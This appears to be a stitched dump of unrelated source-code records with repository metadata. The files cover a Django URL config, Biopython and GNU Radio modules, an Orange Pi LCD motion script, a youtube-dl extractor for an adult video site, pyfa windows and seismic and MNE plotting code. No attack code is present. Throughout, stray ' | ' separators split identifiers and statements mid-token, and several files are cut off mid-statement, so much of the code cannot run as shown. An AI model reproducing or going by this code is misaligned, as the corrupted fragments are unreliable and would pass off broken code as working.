url(r'^captcha/', include('captcha.urls')),
url(r'^attachauth', codewiki.views.attachauth),
# allows direct viewing of the django tables
url(r'^admin/', include(admin.site.urls)),
# favicon
(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to', {'url': '/media/images/favicon.ico'}),
# RSS feeds
url(r'^feeds/(?P<url>.*)/$', 'django.contrib.syndication.views.feed', {'feed_dict': feeds}, name='feeds'),
# API
(r'^api/', include('api.urls', namespace='foo', app_name='api')),
# Status
url(r'^status/$', codewiki.viewsuml.status, name='status'),
# Documentation
(r'^docs/', include('documentation.urls')),
# Robots.txt
(r'^robots.txt$', direct_to_template, {'template': 'robots.txt', 'mimetype': 'text/plain'}),
# pdf cropper technology
(r'^cropper/', include('cropper.urls')),
# froth
(r'^froth/', include('froth.urls')),
# static media server for the dev sites / local dev
url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_DIR, 'show_indexes':True}),
url(r'^media-admin/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ADMIN_DIR, 'show_indexes':True}),
#Rest of the site
url(r'^', include('frontend.urls')),
# redirects from old version
(r'^editor/$', lambda request: HttpResponseRedirect('/scrapers/new/python?template=tutorial_python_trivial')),
(r'^scrapers/show/(?P<short_name>[\w_\-]+)/(?:data/|map-only/)?$',
lambda request, short_name: HttpResponseRedirect(reverse('code_overview', args=['scraper', short_name]))),
)
|
jorgecarleitao/public-contracts | main/__init__.py | Python | bsd-3-clause | 140 | 0 | # See e.g. http://stackoverflow.com/ | a/14076841/931303
# Make PyMySQL impersonate the MySQLdb driver so code importing MySQLdb
# (e.g. Django's MySQL backend) transparently uses it.
# See e.g. http://stackoverflow.com/a/14076841/931303
try:
    import pymysql
    pymysql.install_as_MySQLdb()
except ImportError:
    # PyMySQL is optional; without it the real MySQLdb (if any) is used.
    pass
|
nmercier/linux-cross-gcc | win32/bin/Lib/distutils/command/install_scripts.py | Python | bsd-3-clause | 2,132 | 0.003752 | """distutils.command.install_scripts
Implements the Distutils 'install_scripts' command, for installing
Py | thon scripts."""
# contributed by Bastian Kleineidam
__revision__ = "$Id$"
import os
from distutils.core import Command
from distutils import log
from stat import ST_MODE
class install_scripts (Command):
| description = "install scripts (Python or otherwise)"
user_options = [
('install-dir=', 'd', "directory to install scripts to"),
('build-dir=','b', "build directory (where to install from)"),
('force', 'f', "force installation (overwrite existing files)"),
('skip-build', None, "skip the build steps"),
]
boolean_options = ['force', 'skip-build']
def initialize_options (self):
self.install_dir = None
self.force = 0
self.build_dir = None
self.skip_build = None
def finalize_options (self):
self.set_undefined_options('build', ('build_scripts', 'build_dir'))
self.set_undefined_options('install',
('install_scripts', 'install_dir'),
('force', 'force'),
('skip_build', 'skip_build'),
)
def run (self):
if not self.skip_build:
self.run_command('build_scripts')
self.outfiles = self.copy_tree(self.build_dir, self.install_dir)
if os.name == 'posix':
# Set the executable bits (owner, group, and world) on
# all the scripts we just installed.
for file in self.get_outputs():
if self.dry_run:
log.info("changing mode of %s", file)
else:
mode = ((os.stat(file)[ST_MODE]) | 0555) & 07777
log.info("changing mode of %s to %o", file, mode)
os.chmod(file, mode)
def get_inputs (self):
return self.distribution.scripts or []
def get_outputs(self):
return self.outfiles or []
# class install_scripts
|
BlogomaticProject/Blogomatic | opt/blog-o-matic/usr/lib/python/Bio/Encodings/IUPACEncoding.py | Python | gpl-2.0 | 5,460 | 0.000733 | """Properties once used for transcription and translation (DEPRECATED).
This module is deprecated, and is expected to be removed in the next release.
If you use this module, please contact the Biopython developers via the
mailing lists.
"""
#NOTE - Adding a deprecation warning would affect Bio.Alphabet.IUPAC
# Set up the IUPAC alphabet properties
from Bio.PropertyManager import default_manager
from Bio import Alphabet
from Bio.Alphabet import IUPAC
from Bio.Data import IUPACData
from Bio import Transcribe, Translate
set_prop = default_manager.class_property
# weight tables
set_prop[IUPAC.IUPACUnambiguousDNA]["weight_table"] = \
IUPACData.unambiguous_dna_weights
set_prop[IUPAC.IUPACAmbiguousDNA]["weight_table"] = \
IUPACData.avg_ambiguous_dna_weights
set_prop[IUPAC.IUPACUnambiguousRNA]["weight_table"] = \
IUPACData.unambiguous_rna_weights
set_prop[IUPAC.IUPACAmbiguousRNA]["weight_table"] = \
IUPACData.avg_ambiguous_rna_weights
set_prop[IUPAC.IUPACProtein]["weight_table"] = \
IUPACData.protein_weights
set_prop[IUPAC.ExtendedIUPACProtein]["weight_table"] = \
IUPACData.avg_extended_protein_weights
set_prop[IUPAC.IUPACUnambiguousDNA]["weight_range_table"] = \
IUPACData.unambiguous_dna_weight_ranges
set_prop[IUPAC.IUPACAmbiguousDNA]["weight_range_table"] = \
IUPACData.ambiguous_dna_weight_ranges
set_prop[IUPAC.IUPACUnambiguousRNA]["weight_range_table"] = \
IUPACData.unambiguous_rna_weight_ranges
set_prop[IUPAC.IUPACAmbiguousRNA]["weight_range_table"] = \
IUPACData.ambiguous_rna_weight_ranges
set_prop[IUPAC.IUPACProtein]["weight_range_table"] = \
IUPACData.protein_weight_ranges
set_prop[IUPAC.ExtendedIUPACProtein]["weight_range_table"] = \
IUPACData.extended_protein_weight_ranges
# transcriber objects
set_prop[Alphabet.DNAAlphabet]["transcriber"] = \
Transcribe.generic_transcriber
set_prop[IUPAC.IUPACAmbiguousDNA]["transcriber"] = \
Transcribe.ambiguous_transcriber
set_prop[IUPAC.IUPACUnambiguousDNA]["transcriber"] = \
Transcribe.unambiguous_transcriber
set_prop[Alphabet.RNAAlphabet]["transcriber"] = \
Transcribe.generic_transcriber
set_prop[IUPAC.IUPACAmbiguousRNA]["transcriber"] = \
Transcribe.ambiguous_transcriber
set_prop[IUPAC.IUPACUnambiguousRNA]["transcriber"] = \
Transcribe.unambiguous_transcriber
# translator objects
for name, obj in Translate.unambiguous_dna_by_name.iteritems():
property = "translator.name." + name
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
set_prop[obj.table.protein_alphabet.__class__][property] = obj
for name, obj in Translate.unambiguous_rna_by_name.iteritems():
property = "translator.name." + name
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "rna_translator.name." + name
set_prop[obj.table.protein_alphabet.__class__][property] = obj
for id, obj in Translate.unambiguous_dna_by_id.iteritems():
property = "translator.id.%d" % id
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
set_prop[obj.table.protein_alphabet.__class__][property] = obj
if id == 1:
set_prop[obj.table.nucleotide_alphabet.__class__]["translator"] = obj
set_prop[obj.table.protein_alphabet.__class__]["translator"] = obj
for id, obj in Translate.unambiguous_rna_by_id.iteritems():
property = "translator.id.%d" % id
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "rna_translator.id.%d" % id
set_prop[obj.table.protein_alphabet.__class__][property] = obj
if id == 1:
set_prop[obj.table.nucleotide_alphabet.__class__]["translator"] = obj
set_prop[obj.table.protein_alphabet.__class__]["rna_translator"] = obj
# ambiguous translator objects
for name, obj in Translate.ambiguous_dna_by_name.iteritems():
property = "translator.name." + name
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "ambiguous_translator.name." + name
set_prop[obj.table.protein_alphabet.__class__][property] = obj
for name, obj in Translate.ambiguous_rna_by_name.iteritems():
property = "translator.name." + name
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "ambiguous_rna_translator.name." + name
set_prop[obj.table.protein_alphabet.__class__][property] = obj
for id, obj in Translate.ambiguous_dna_by_id.iteritems():
property = "translator.id.%d" % id
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "ambiguous_translator.id.%d" % id
set_prop[obj.table.protein_alphabet.__class__][property] = obj
if id == 1:
set_prop[obj.tab | le.nucleotide_alphabet.__class__]["translator"] = obj
set_prop[obj.table.protein_alphabet.__class__]["ambiguous_translator"] = obj
for id, obj in Translate.ambiguous_rna_by_id.iteritems():
property = "translator.id.%d" % id
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "ambiguous_rna_translator.id.%d" % id
set_prop[obj.table.protein_alphabet.__class__][property] = obj
if i | d == 1:
set_prop[obj.table.nucleotide_alphabet.__class__]["translator"] = obj
set_prop[obj.table.protein_alphabet.__class__]["ambiguous_rna_translator"] = obj
|
learntextvis/textkit | textkit/filter/filter_lengths.py | Python | mit | 491 | 0 | import click
from textkit.utils import output, read_tokens
|
@click.command()
@click.argument('tokens', type=click.File('r'), default=click.open_file('-'))
@click.option('-m', '--minimum', default=3,
help='Minimum length of token to not filter.', show_default=True)
def filterlengths(minimum, tokens):
'''Remove tokens that are shorter th | en the minimum length provided.'''
content = read_tokens(tokens)
[output(token) for token in content if len(token) >= minimum]
|
Tim---/osmo-tetra | src/demod/python/cqpsk.py | Python | agpl-3.0 | 14,762 | 0.009619 | #
# Copyright 2005,2006,2007 Free Software Foundation, Inc.
#
# cqpsk.py (C) Copyright 2009, KA1RBI
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# See gnuradio-examples/python/digital for examples
"""
differential PI/4 CQPSK modulation and demodulation.
"""
from gnuradio import gr, gru, blocks, analog, filter, digital
from gnuradio.filter import firdes
from math import pi, sqrt
#import psk
import cmath
from pprint import pprint
_def_has_gr_digital = False
# address gnuradio 3.5.x chan | ges
try:
from gnuradio import modulation_utils
except ImportError:
from gnuradio import digital
_def_has_gr_dig | ital = True
# default values (used in __init__ and add_options)
_def_samples_per_symbol = 10
_def_excess_bw = 0.35
_def_gray_code = True
_def_verbose = False
_def_log = False
_def_costas_alpha = 0.15
_def_gain_mu = None
_def_mu = 0.5
_def_omega_relative_limit = 0.005
# /////////////////////////////////////////////////////////////////////////////
# CQPSK modulator
# /////////////////////////////////////////////////////////////////////////////
class cqpsk_mod(gr.hier_block2):
def __init__(self,
samples_per_symbol=_def_samples_per_symbol,
excess_bw=_def_excess_bw,
verbose=_def_verbose,
log=_def_log):
"""
Hierarchical block for RRC-filtered QPSK modulation.
The input is a byte stream (unsigned char) and the
output is the complex modulated signal at baseband.
@param samples_per_symbol: samples per symbol >= 2
@type samples_per_symbol: integer
@param excess_bw: Root-raised cosine filter excess bandwidth
@type excess_bw: float
@param verbose: Print information about modulator?
@type verbose: bool
@param debug: Print modualtion data to files?
@type debug: bool
"""
gr.hier_block2.__init__(self, "cqpsk_mod",
gr.io_signature(1, 1, gr.sizeof_char), # Input signature
gr.io_signature(1, 1, gr.sizeof_gr_complex)) # Output signature
self._samples_per_symbol = samples_per_symbol
self._excess_bw = excess_bw
if not isinstance(samples_per_symbol, int) or samples_per_symbol < 2:
raise TypeError, ("sbp must be an integer >= 2, is %d" % samples_per_symbol)
ntaps = 11 * samples_per_symbol
arity = 8
# turn bytes into k-bit vectors
self.bytes2chunks = \
gr.packed_to_unpacked_bb(self.bits_per_symbol(), gr.GR_MSB_FIRST)
# 0 +45 1 [+1]
# 1 +135 3 [+3]
# 2 -45 7 [-1]
# 3 -135 5 [-3]
self.pi4map = [1, 3, 7, 5]
self.symbol_mapper = gr.map_bb(self.pi4map)
self.diffenc = gr.diff_encoder_bb(arity)
self.chunks2symbols = gr.chunks_to_symbols_bc(psk.constellation[arity])
# pulse shaping filter
self.rrc_taps = firdes.root_raised_cosine(
self._samples_per_symbol, # gain (sps since we're interpolating by sps)
self._samples_per_symbol, # sampling rate
1.0, # symbol rate
self._excess_bw, # excess bandwidth (roll-off factor)
ntaps)
self.rrc_filter = filter.interp_fir_filter_ccf(self._samples_per_symbol, self.rrc_taps)
if verbose:
self._print_verbage()
if log:
self._setup_logging()
# Connect & Initialize base class
self.connect(self, self.bytes2chunks, self.symbol_mapper, self.diffenc,
self.chunks2symbols, self.rrc_filter, self)
def samples_per_symbol(self):
return self._samples_per_symbol
def bits_per_symbol(self=None): # staticmethod that's also callable on an instance
return 2
bits_per_symbol = staticmethod(bits_per_symbol) # make it a static method. RTFM
def _print_verbage(self):
print "\nModulator:"
print "bits per symbol: %d" % self.bits_per_symbol()
print "Gray code: %s" % self._gray_code
print "RRS roll-off factor: %f" % self._excess_bw
def _setup_logging(self):
print "Modulation logging turned on."
self.connect(self.bytes2chunks,
blocks.file_sink(gr.sizeof_char, "tx_bytes2chunks.dat"))
self.connect(self.symbol_mapper,
blocks.file_sink(gr.sizeof_char, "tx_graycoder.dat"))
self.connect(self.diffenc,
blocks.file_sink(gr.sizeof_char, "tx_diffenc.dat"))
self.connect(self.chunks2symbols,
blocks.file_sink(gr.sizeof_gr_complex, "tx_chunks2symbols.dat"))
self.connect(self.rrc_filter,
blocks.file_sink(gr.sizeof_gr_complex, "tx_rrc_filter.dat"))
def add_options(parser):
"""
Adds QPSK modulation-specific options to the standard parser
"""
parser.add_option("", "--excess-bw", type="float", default=_def_excess_bw,
help="set RRC excess bandwith factor [default=%default] (PSK)")
parser.add_option("", "--no-gray-code", dest="gray_code",
action="store_false", default=_def_gray_code,
help="disable gray coding on modulated bits (PSK)")
add_options=staticmethod(add_options)
def extract_kwargs_from_options(options):
"""
Given command line options, create dictionary suitable for passing to __init__
"""
return modulation_utils.extract_kwargs_from_options(dqpsk_mod.__init__,
('self',), options)
extract_kwargs_from_options=staticmethod(extract_kwargs_from_options)
# /////////////////////////////////////////////////////////////////////////////
# CQPSK demodulator
#
# /////////////////////////////////////////////////////////////////////////////
class cqpsk_demod(gr.hier_block2):
def __init__(self,
samples_per_symbol=_def_samples_per_symbol,
excess_bw=_def_excess_bw,
costas_alpha=_def_costas_alpha,
gain_mu=_def_gain_mu,
mu=_def_mu,
omega_relative_limit=_def_omega_relative_limit,
gray_code=_def_gray_code,
verbose=_def_verbose,
log=_def_log):
"""
Hierarchical block for RRC-filtered CQPSK demodulation
The input is the complex modulated signal at baseband.
The output is a stream of floats in [ -3 / -1 / +1 / +3 ]
@param samples_per_symbol: samples per symbol >= 2
@type samples_per_symbol: float
@param excess_bw: Root-raised cosine filter excess bandwidth
@type excess_bw: float
@param costas_alpha: loop filter gain
@type costas_alphas: float
@param gain_mu: for M&M block
@type gain_mu: float
@param mu: for M&M block
@type mu: float
@param omega_relative_limit: for M&M block
@type omega_relative_limit: float
@param gray_code: Tell modulator to Gray code the bits
@type gray_code: bool
@param verbose: Print information about modulator?
@type verbose: bool
@param debug: Print modualtion data to files?
@type debug: bool
"""
gr.hier_block2.__init__(self, "cqpsk_demod",
gr.io_signature(1, 1, gr.sizeof_gr_complex), # Input signature
gr.io_signature(1, 1, gr.sizeof_float)) # Output signature
self._samples_per_symbol |
mhkyg/OrangePIStuff | motion/motion.py | Python | mit | 2,565 | 0.061009 | #!/usr/bin/python
# coding=UTF-8
#import RPi.GPIO as GPIO_detector #raspberry version
from pyA20.gpio import gpio
import time
import datetime
import locale
import sys
import os
from char_lcd2 import OrangePiZero_CharLCD as LCD
def file_get_contents(filename):
with open(filename) as f:
return f.read()
# Orange Pi pin configuration:
lcd_rs = 14
lcd_en = 10
lcd_d4 = 12
lcd_d5 = 11
lcd_d6 = 6
lcd_d7 = 0
lcd_backlight = 13
# Define LCD column and row size for 16x2 LCD.
lcd_columns = 16
lcd_rows = 2
#GPIO_detector.setmode(GPIO_detector.BCM)
PIR_PIN = 16
#GPIO_detector.setup(PIR_PIN, GPIO_detector.IN)
lcd = LCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,
lcd_columns, lcd_rows, lcd_backlight)
lcd.create_char(0,[ 2,4,14,1,15,17,15,0]); # á
lcd.create_char(1,[ 2,4,14,17,30,16,14,0]); # é
lcd.create_char(2,[ 10,0,0,17,17,17,14,0]); # ü
lcd.create_char(3,[ 10,0,14,17,17,17,14,0]); # ö
lcd.create_char(4,[ 5,10,14,17,17,17,14,0]); # ő
def MOTION():
week_days = ["Vas\x00rnap","H\x01tf\x04","Kedd","Szerda","Cs\x02t\x03rt\x03k","P\x01ntek","Szombat"]
#het_napjai = ["Kedd","Szerda","Csütörtök","P\x01ntek","Szombat","Vas\x00rnap","\x00\x01\x02\x03\x04"]
lcd.clear()
#print("lite on")
lcd.set_backlight(0)
lcd_text = file_get_contents(os.path.dirname(os.path.abspath(__file__)) + "/../data/k | ijelzo.txt");
for x in range(0, 4):
if (x % 2) == 0 :
time_data = datetime.datetime.now().strftime('%Y-%m-%d') +' '+ datetime.datetime.now().strftime('%H:%M:%S') +'\n'+ week_days[int(datetime.datetime.now().strftime('%w'))] ;
lcd.clear()
lcd.message(time_data);
else:
lcd.clear()
lcd.message( lcd_text);
time.sleep(5.0);
|
print(lcd_text);
lcd.clear()
lcd.set_backlight(1)
gpio.setcfg(PIR_PIN, gpio.INPUT)
gpio.pullup(PIR_PIN, gpio.PULLUP)
# endless loop
try:
#GPIO_detector.add_event_detect(PIR_PIN, GPIO_detector.RISING, callback=MOTION, bouncetime=300)
print("event atached start loop");
count = 0
while 1:
if (gpio.input(PIR_PIN)==1):
count += 1;
if count > 1 :
MOTION()
time.sleep(0.1)
else:
#print "no Motion"
count = 0
time.sleep(0.1)
except KeyboardInterrupt:
print(" Quit")
lcd.set_backlight(1)
#GPIO_detector.cleanup()
#except:
# print "Unexpected error:", sys.exc_info()[0]
# lcd.set_backlight(1)
#
|
Agrajag-Petunia/existential-romantic-novel | run.py | Python | mit | 1,939 | 0 | from datetime import datetime
from src.textgenerator import TextGenerator
from src.utils import extract_project_gutenberg_novel, remove_titles
# The source files to use
# NOTE: Ulysses makes the generated text just a little too weird.
files = [
'./data/life_and_amours.txt',
'./data/memoirs_of_fanny_hill.txt',
'./data/metamorphosis.txt',
'./data/the_romance_of_lust.txt',
'./data/the_trial.txt',
# './data/ulysses.txt',
'./data/the_antichrist.txt',
'./data/beyond_good_and_evil.txt',
]
total_word_count = 50000
chapters = 23
words_per_chapter = int(50000 / 23)
output = ""
# Build our text generator (I found a prefix length of 2 or 3 worked best)
model = TextGenerator(prefix_length=3)
# Just to remind you which novels are being used
print(files)
# Iterate over our files
for filename in files:
# For each file read in the text and work it into our
# model.
with open(filename, 'r') as fobj:
print('Learning text from {}...'.format(filename))
# | remove project gutenberg license stuff from the text
text = extract_project_gutenberg_novel(fobj.read())
# Strip the title, chapters, etc from the text.
text = remove_titles(text)
# Learn the cleaned up text
model.learn(text)
# Start generating our novel
with open('./data/novel.txt', 'w') as fobj:
# Start by printing out summary content
fobj.write("Y | ou are free and that is why you lust\n")
fobj.write("=====================================\n\n")
fobj.write("Author: Agrajag Petunia's computer\n")
fobj.write("Generation Date: {}\n\n".format(
datetime.now().strftime("%Y-%m-%d")
))
# For each chapter generate some text
for c in range(1, chapters + 1):
fobj.write("\n\n\tChapter {}\n".format(c))
fobj.write("---------------------------\n")
output = model.generate(size=words_per_chapter)
fobj.write(output)
|
pyfa-org/Pyfa | gui/auxWindow.py | Python | gpl-3.0 | 2,871 | 0.001393 | # =============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of pyfa.
#
# pyfa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pyfa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A | PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyfa. If not, see <http://www.gnu.org/licenses/>.
# =============================================================== | ==============
# noinspection PyPackageRequirements
import wx
class AuxiliaryMixin:
_instance = None
def __init__(self, parent, id=None, title=None, pos=None, size=None, style=None, name=None, resizeable=False):
baseStyle = wx.FRAME_NO_TASKBAR | wx.CAPTION | wx.CLOSE_BOX | wx.SYSTEM_MENU
if parent is not None:
baseStyle = baseStyle | wx.FRAME_FLOAT_ON_PARENT
if resizeable:
baseStyle = baseStyle | wx.RESIZE_BORDER | wx.MAXIMIZE_BOX
kwargs = {
'parent': parent,
'style': baseStyle if style is None else baseStyle | style}
if id is not None:
kwargs['id'] = id
if title is not None:
kwargs['title'] = title
if pos is not None:
kwargs['pos'] = pos
if size is not None:
kwargs['size'] = size
if name is not None:
kwargs['name'] = name
super().__init__(**kwargs)
# Intercept copy-paste actions and do nothing in secondary windows,
# otherwise on Mac OS X Cmd-C brings up copy fit dialog
if 'wxMac' in wx.PlatformInfo:
self.Bind(wx.EVT_MENU, self.OnSuppressedAction, id=wx.ID_COPY)
self.Bind(wx.EVT_MENU, self.OnSuppressedAction, id=wx.ID_PASTE)
if 'wxMSW' in wx.PlatformInfo:
self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_BTNFACE))
@classmethod
def openOne(cls, parent, *args, forceReopen=False, **kwargs):
"""If window is open and alive - raise it, open otherwise"""
if not cls._instance or forceReopen:
if cls._instance:
cls._instance.Close()
frame = cls(parent, *args, **kwargs)
cls._instance = frame
frame.Show()
else:
cls._instance.Raise()
return cls._instance
def OnSuppressedAction(self, event):
return
class AuxiliaryFrame(AuxiliaryMixin, wx.Frame):
pass
class AuxiliaryDialog(AuxiliaryMixin, wx.Dialog):
pass
|
nandhp/youtube-dl | youtube_dl/extractor/porn91.py | Python | unlicense | 2,707 | 0.00076 | # encoding: utf-8
from __future__ import unicode_literals
from ..compat import (
compat_urllib_parse_unquote,
compat_urllib_parse_urlencode,
)
from .common import InfoExtractor
from ..utils import (
parse_duration,
int_or_none,
ExtractorError,
)
class Porn91IE(InfoExtractor):
IE_NAME = '91porn'
_VALID_URL = r'(?:https?://)(?:www\.|)91porn\.com/.+?\?viewkey=(?P<id>[\w\d]+)'
_TEST = {
'url': 'http://91porn.com/view_video.php?viewkey=7e42283b4f5ab36da134',
'md5': '6df8f6d028bc8b14f5dbd73af742fb20',
'info_dict': {
'id': '7e42283b4f5ab36da134',
'title': '18岁大一漂亮学妹,水嫩性感,再爽一次!',
'ext': 'mp4',
'duration': 431,
'age_limit': 18,
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
self._set_cookie('91porn.com', 'language', 'cn_CN')
webpage = self._download_webpage(
'http://91porn.com/view_video.php?viewkey=%s' % video_id, video_id)
if '作为游客,你每天只可观看10个视频' in webpage:
raise ExtractorError('91 Porn says: Daily limit 10 videos exceeded', expected=True)
title = self._search_regex(
r'<div id="viewvideo-title">([^<]+)</div>', webpage, 'title')
title = title.replace('\n', '')
# get real url
file_id = self._search_regex(
r'so.addVariable\(\'file\',\'(\d+)\'', webpage, 'file id')
sec_code = self._search_regex(
r'so.addVariable\(\'seccode\',\'([^\']+)\'', webpage, 'sec code')
max_vid = self._search_regex(
r'so.addVariable\(\'max_vid\',\'(\d+)\'', webpage, 'max vid')
url_params = compat_urllib_parse_urlencode({
'VID': file_id,
'mp4': '1',
'seccode': sec_code | ,
'max_vid': max_vid,
| })
info_cn = self._download_webpage(
'http://91porn.com/getfile.php?' + url_params, video_id,
'Downloading real video url')
video_url = compat_urllib_parse_unquote(self._search_regex(
r'file=([^&]+)&', info_cn, 'url'))
duration = parse_duration(self._search_regex(
r'时长:\s*</span>\s*(\d+:\d+)', webpage, 'duration', fatal=False))
comment_count = int_or_none(self._search_regex(
r'留言:\s*</span>\s*(\d+)', webpage, 'comment count', fatal=False))
return {
'id': video_id,
'title': title,
'url': video_url,
'duration': duration,
'comment_count': comment_count,
'age_limit': self._rta_search(webpage),
}
|
trichter/sito | bin/noise/noise_s_final_autocorr2.py | Python | mit | 5,012 | 0.006185 | #!/usr/bin/env python
# by TR
from obspy.core import UTCDateTime as UTC
from sito.data import IPOC
from sito.noisexcorr import (prepare, get_correlations,
plotXcorrs, noisexcorrf, stack)
from sito import util
import matplotlib.pyplot as plt
from sito.stream import read
from multiprocessing import Pool
import time
from sito import seismometer
def main():
stations = 'PB01 PB02 PB03 PB04 PB05 PB06 PB07 PB08 HMBCX MNMCX PATCX PSGCX LVC'
#stations = 'PB09 PB10 PB11 PB12 PB13 PB14 PB15 PB16'
stations2 = None
components = 'Z'
# TOcopilla earthquake: 2007-11-14 15:14
t1 = UTC('2006-02-01')
t2 = UTC('2012-10-01')
shift = 100
correlations = get_correlations(stations, components, stations2, only_auto=True)
method = 'FINAL_filter1-3_1bit_auto'
data = IPOC(xcorr_append='/' + method, use_local_LVC=False)
data.setXLogger('_' + method)
# pool = Pool()
# prepare(data, stations.split(), t1, t2, component=components,
# filter=(1, 3, 2, True), downsample=20,
# eventremoval='waterlevel_env2', param_removal=(10, 0),
# whitening=False,
# normalize='1bit', param_norm=None,
# pool=pool)
# noisexcorrf(data, correlations, t1, t2, shift, pool=pool)
# pool.close()
# pool.join()
# plotXcorrs(data, correlations, t1, t2, start=None, end=None, plot_overview=True, plot_years=False, use_dlognorm=False,
# plot_stack=True, plot_psd=False, add_to_title='', downsample=None)
plt.rc('font', size=16)
plotXcorrs(data, correlations, t1, t2, start=0, end=20, plot_overview=True, plot_years=False, use_dlognorm=False,
plot_stack=True, plot_psd=False, downsample=None, ext='_hg_dis.pdf', vmax=0.1, ylabel=None,
add_to_title='1-3Hz')
# stack(data, correlations, dt= -1)
# stack(data, correlations, dt=10 * 24 * 3600, shift=2 * 24 * 3600)
# plotXcorrs(data, correlations, t1=None, t2=None, start=None, end=None, plot_overview=True, plot_years=False, use_dlognorm=False,
# plot_stack=True, plot_psd=False, add_to_title='', downsample=None,
# stack=('10days', '2days'))
# plotXcorrs(data, correlations, t1=None, t2=None, start=0, end=20, plot_overview=True, plot_years=False, use_dlognorm=False,
# plot_stack=True, plot_psd=False, add_to_title='', downsample=None,
# stack=('10days', '2days'), ext='_hg.png', vmax=0.1)
# util.checkDir(data.getPlotX(('', ''), t1))
#for correlation in correlations:
# stations = correlation[0][:-1], corr | elation[1][:-1]
# dist = data.stations.dist(*stations)
## if dist >= 120:
## t = (dist // 100) * 50 + 50
## else:
## t = 70
# t = 200
# stream = data.readDayXcorr(correlation, t1, t2)
# if len(stream) > 0:
# stream.plotXcorr(-t, t, imshow=True, vmax=0.01, vmin_rel='vmax',
# fig=plt.figure(figsize=(8.267, 11.693)),
# figtitle='station ' + method + ' around To | copilla event',
# dateformatter='%y-%m-%d', show=False,
# save=data.getPlotX(correlation, 'Tocopilla_0.01.png'),
# stack_lim=None)
#
# method = 'rm5_filter0.1-1'
# data = IPOC(xcorr_append='/tests/' + method, use_local_LVC=True)
# data.setXLogger('_' + method)
# prepare(data, stations.split(' '), t1, t2, filter=(0.1, 1.), downsample=10,
# component=components, normalize='runningmean', norm_param=5 * 10 + 1,
# use_floating_stream=True)
# xcorr_day(data, correlations, t1, t2, shift, use_floating_stream=True)
# plotXcorrs(data, correlations, t1, t2, plot_overview=False, plot_stack=True, plot_psd=True, add_to_title=method)
#
#
# method = 'rm50_filter0.01'
# data = IPOC(xcorr_append='/tests/' + method, use_local_LVC=True)
# data.setXLogger('_' + method)
# prepare(data, stations.split(' '), t1, t2, filter=(0.01, None), downsample=None,
# component=components, normalize='runningmean', norm_param=50 * 100 + 1,
# use_floating_stream=True)
# xcorr_day(data, correlations, t1, t2, shift, use_floating_stream=True)
# plotXcorrs(data, correlations, t1, t2, plot_overview=False, plot_stack=True, plot_psd=True, add_to_title=method)
#
#
# method = 'rm0.25_filter2'
# data = IPOC(xcorr_append='/tests/' + method, use_local_LVC=True)
# data.setXLogger('_' + method)
# prepare(data, stations.split(' '), t1, t2, filter=(2, None), downsample=None,
# component=components, normalize='runningmean', norm_param=100 // 4 + 1,
# use_floating_stream=True)
# xcorr_day(data, correlations, t1, t2, shift, use_floating_stream=True)
# plotXcorrs(data, correlations, t1, t2, plot_overview=False, plot_stack=True, plot_psd=True, add_to_title=method)
if __name__ == '__main__':
main()
|
teonlamont/mne-python | mne/viz/evoked.py | Python | bsd-3-clause | 94,662 | 0.000011 | # -*- coding: utf-8 -*-
"""Functions to plot evoked M/EEG data (besides topographies)."""
from __future__ import print_function
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Cathy Nangini <cnangini@gmail.com>
# Mainak Jas <mainak@neuro.hut.fi>
#
# License: Simplified BSD
from functools import partial
from copy import deepcopy
from numbers import Integral
import numpy as np
from ..io.pick import (channel_type, _pick_data_channels,
_VALID_CHANNEL_TYPES, channel_indices_by_type,
_DATA_CH_TYPES_SPLIT, _pick_inst, _get_channel_types,
_PICK_TYPES_DATA_DICT)
from ..externals.six import string_types
from ..defaults import _handle_default
from .utils import (_draw_proj_checkbox, tight_layout, _check_delayed_ssp,
plt_show, _process_times, DraggableColorbar, _setup_cmap,
_setup_vmin_vmax, _grad_pair_pick_and_name, _check_cov,
_validate_if_list_of_axes, _triage_rank_sss,
_connection_line, _get_color_list, _setup_ax_spines,
_setup_plot_projector, _prepare_joint_axes,
_set_title_multiple_electrodes, _check_time_unit,
_plot_masked_image)
from ..utils import (logger, _clean_names, warn, _pl, verbose, _validate_type,
_check_if_nan)
from .topo import _plot_evoked_topo
from .topomap import (_prepare_topo_plot, plot_topomap, _check_outlines,
_draw_outlines, _prepare_topomap, _set_contour_locator)
from ..channels.layout import _pair_grad_sensors, _auto_topomap_coords
def _butterfly_onpick(event, params):
"""Add a channel name on click."""
params['need_draw'] = True
ax = event.artist.axes
ax_idx = np.where([ax is a for a in params['axes']])[0]
